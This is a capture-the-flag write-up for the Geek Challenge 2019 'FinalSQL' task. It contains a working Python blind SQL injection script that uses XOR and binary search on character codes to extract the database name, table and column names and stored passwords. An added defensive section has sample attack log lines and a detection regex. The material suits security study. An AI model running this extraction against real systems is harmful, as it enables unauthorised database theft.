[Geek Challenge 2019] FinalSQL

Posted 夜幕下的灯火阑珊

Key concepts

  • Blind SQL injection

Challenge URL

http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1

 

 

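Since 1^2=3 (bitwise XOR), setting id=1^2 successfully returns the page for id=3, which shows that the parameter is evaluated as an expression.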

 


Script

# -*- coding: utf-8 -*-
import time
import requests

url = 'http://953804e7-748b-4851-a646-78e820e28651.node3.buuoj.cn/search.php?id=1'
res = ''
for i in range(1, 500):
    print(i)
    # Binary search over the ASCII range for the i-th character
    left = 31
    right = 127
    mid = left + ((right - left) >> 1)
    while left < right:
        #payload = "^(ascii(substr(database(),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),{},1))>{})".format(i,mid)
        payload = "^(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i, mid)
        r = requests.get(url=url + payload)
        #print(mid)
        if r.status_code == 429:
            print('too fast')
            time.sleep(1)
            continue  # retry the same guess instead of reading the 429 body
        # Marker absent: the comparison was true, so search the upper half
        if 'NO! Not this! Click others~~~' not in r.text:
            left = mid + 1
        elif 'NO! Not this! Click others~~~' in r.text:
            right = mid
        mid = left + ((right - left) >> 1)
    # Hitting either bound means there is no further character: stop
    if mid == 127 or mid == 31:
        break
    res += chr(mid)
    print(str(mid), res)
# database: geek
# tables: F1naI1y,Flaaaaag
# columns: id,username,password  id,fl4gawsl
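
Seen from the server side, the script above leaves a distinctive trail: many requests whose id value is not a plain integer and carries an ascii(substr(...,pos,1))>guess comparison. The following is an added example, not part of the original write-up, that flags that pattern in an access log; the log format, the sample lines and the names analyze, LINE_RE and PROBE_RE are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (client, request line, status); not taken from the page.
SAMPLE_LOG = """\
203.0.113.7 "GET /search.php?id=1 HTTP/1.1" 200
203.0.113.7 "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E79) HTTP/1.1" 200
203.0.113.7 "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E103) HTTP/1.1" 200
203.0.113.7 "GET /search.php?id=1%5E(ascii(substr(database(),1,1))%3E91) HTTP/1.1" 429
203.0.113.7 "GET /search.php?id=1%5E(ascii(substr(database(),2,1))%3E79) HTTP/1.1" 200
198.51.100.4 "GET /search.php?id=3 HTTP/1.1" 200
198.51.100.4 "GET /search.php?id=abc HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})$')
# Probe shape used by the script above: ascii(substr(<expr>,<pos>,1))><guess>
PROBE_RE = re.compile(
    r"ascii\(\s*substr\(.*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)", re.I | re.S)


def analyze(log_text, min_probes=3):
    """Summarise, per client, id values that look like boolean-blind extraction."""
    stats = defaultdict(lambda: {"probes": 0, "positions": set(),
                                 "non_numeric": 0, "throttled": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, target, status = m.groups()
        # parse_qs percent-decodes the value, so %5E and %3E become ^ and >
        for value in parse_qs(urlsplit(target).query).get("id", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # a legitimate id is a plain integer
            s = stats[client]
            s["non_numeric"] += 1
            probe = PROBE_RE.search(value)
            if probe:
                s["probes"] += 1
                s["positions"].add(int(probe.group(1)))
                s["throttled"] += status == "429"  # rate limiter already firing
    return {c: {**s, "positions": sorted(s["positions"])}
            for c, s in stats.items() if s["probes"] >= min_probes}


if __name__ == "__main__":
    for client, summary in analyze(SAMPLE_LOG).items():
        print(client, summary)
```

The same integer-only check on id, applied in the application before the value reaches the query, removes the injection point that the XOR test demonstrates.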

 
